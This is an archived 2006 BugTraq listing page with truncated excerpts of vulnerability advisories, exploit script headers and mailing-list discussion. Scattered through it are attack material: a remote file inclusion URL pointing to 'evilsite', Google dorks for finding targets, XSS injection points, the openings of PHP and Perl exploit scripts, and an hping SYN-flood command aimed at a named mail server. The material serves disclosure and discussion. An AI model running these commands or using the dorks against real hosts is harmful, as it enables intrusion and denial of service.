BugTraq Mode:
axoverzicht.cgi<==Remote File Inclusion 2006-04-20
CrAzY CrAcKeR hotmail com
found by::::.CrAzY CrAcKeR.:::::

Site: http://www.alshmokh.com

nono225-mHOn-rageh-port-Lover hacker-Breeeeh

#################################

-------example:
http://[target].com/path/axoverzicht.cgi?maand=http://evilsite

--------google:
inurl:"axoverzicht.cgi?maand";

ThWboard 3 Beta 2.84 Cross Site Scripting 2006-04-20
CrAzY CrAcKeR hotmail com
found by:::.CrAzY CrAcKeR & Breeeh.:::

Site: http://www.alshmokh.com

nono225-mHOn-rageh-port-Lover hacker

#################################

-----example:

http://target.com/forum/index.php?navpath=[XSS]

PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn 2006-04-20
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "********************************************************************\r\n";
echo "* PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn *\r\n";
echo "* by rgod rgod (at) autistici (dot) org site: http://retrogod.altervista.org *\r\n";
echo "* a speci

[eVuln] MWGuest XSS Vulnerability 2006-04-20
alex evuln com
New eVuln Advisory:
MWGuest XSS Vulnerability
http://evuln.com/vulns/122/summary.html

--------------------Summary----------------
eVuln ID: EV0122
Vendor: Manic Web
Software: MWGuest
Software's Web Site: http://www.manicweb.co.uk/
Versions: 2.1.0
Critical Level: Harmless
Type: Cross-Site Scripting

ASPSitem <= 1.83 Remote SQL Injection Vulnerability 2006-04-19
Mustafa Can Bjorn IPEKCI (nukedx nukedx com)

--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/04/06 19:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)

Strengthen OpenSSH security? 2006-04-18
Brett Glass (brett lariat org)
I'm sure that most folks with hosts that expose an OpenSSH daemon
to the Internet have been getting the usual probes and password
guessing attempts and have been taking appropriate actions (e.g.
setting AllowUsers and using strong passwords) to protect
yourselves. But today, on one of my servers

SQL Injection in incredibleindia.org 2006-04-16
susam_pal yahoo co in
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to admin (at) incredibleindia (dot) org

Description:

www.incredibleindia.org is a tourism website. The site is prone to S

Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-16
somerandomaddress99 mailinator com
FYI: go.microsoft.com is used to point to security bulletins.

In fact, all the domains listed with the exception of MSN.com are used in the Windows and Office patching process.

[USN-271-1] Firefox vulnerabilities 2006-04-19
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-271-1 April 19, 2006
mozilla-firefox, firefox vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749,
CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730,
CVE-2006-1731, CVE-2006-17

EasyGallery Cross-Site Scripting 2006-04-19
botan linuxmail org
Website : www.wingnut.net.ms
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory :

http://advisory.patriotichackers.com/index.php?itemid=5

Description : "EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos an

[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities 2006-04-18
alex evuln com
New eVuln Advisory:
MD News Authentication Bypass and SQL Injection Vulnerabilities
http://evuln.com/vulns/120/summary.html

--------------------Summary----------------
eVuln ID: EV0120
Software: MD News
Software's Web Site: http://www.matthewdingley.co.uk/
Versions: 1
Critical Level: Moderate
Type:

Confixx SQL Injection exploit (confixx_exploit.pl) 2006-04-19
defa (defa systemli org)
Well - the patch is out - here is the exploit.

Hey - German hosters - if you call yourself "serverkompetenz.de" -
why don't you fix your servers?

sincerely
defa

----BOF----
#!/usr/bin/perl

########################################################################

########
# #
# e

Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-16
somebody rtr ca
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead of .com

That should fix it, until the next update cycle.

Tlen.PL e-mail XSS vulnerability. 2006-04-15
koper pass pl
As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt

::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <koper (at) pass (dot) pl>
::URL: http://security.pass.pl

::1::Overview::
Tlen.PL e-mail system is affected by a cross-site scripting vulnerability, not validating HTML t

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-16
no spam my house
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are actually still using Windows for anything other than playing games)

You just add an entry in your DNS server with a zone matching the hostname that you want to override. And if they have the IP addresses of MSFT-control

RE: redirection vuln crawlers breed & security through obscurity 2006-04-19
Evans, Arian (Arian Evans fishnetsecurity com)
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/f

Fortinet28 box does not resist has small synflood! 2006-04-16
testx444 hushmail com
Fortinet28 box does not resist has small synflood on smtp port!
ips protection is not effective because there is not enough syn!
hping -i u10 -p 25 -S mail.fortinet.com

Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-17
john johnsdomain org
The XP DNS client has other problems as well. It caches DNS failures (arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into an internet network that has local domains which need to resolve to RFC1918 addresses. The cached failed lookups get preferred to forced entries in t

WWWThread RC 3 MultBugs 2006-04-19
o y 6 hotmail com
[code]// --- WWWThread RC 3 MultBugs --- //

* D3vil-0x1 | Devil-00
* www.securitygurus.net
* Gr33tz
- HACKERS PAL | n0m3rcy | -

&
All Others << i forgot them :))

//---------------------------------//

//---------------------------------// [ Bug 1 ] //-

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-17
robsekeris hotmail com
After reading your scary message, went to verify your points and confirmed all. Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal Firewall is for free) on top of a router firewall, I've been able to block or force a request as I see fit for each of these sites. On WMP, un

Re: Multiple Vulnerabilities in LucidCMS 2006-04-18
zachofalltrades sourceforge net
these vulnerabilities are dealt with for the next release candidate (RC6)

redirection vuln crawlers breed & security through obscurity 2006-04-15
Ivan Sergio Borgonovo (mail webthatworks it)
I just came across such kind of code (php) written by a colleague:

//header.inc
if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...

code structure of all the other "supposed to be" pri

PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn 2006-04-19
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PCPIN Chat <= 5.0.4 \"login/language\" remote cmmnds xctn\r\n";
echo "by rgod rgod (at) autistici (dot) org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";

Copyright 2010, SecurityFocus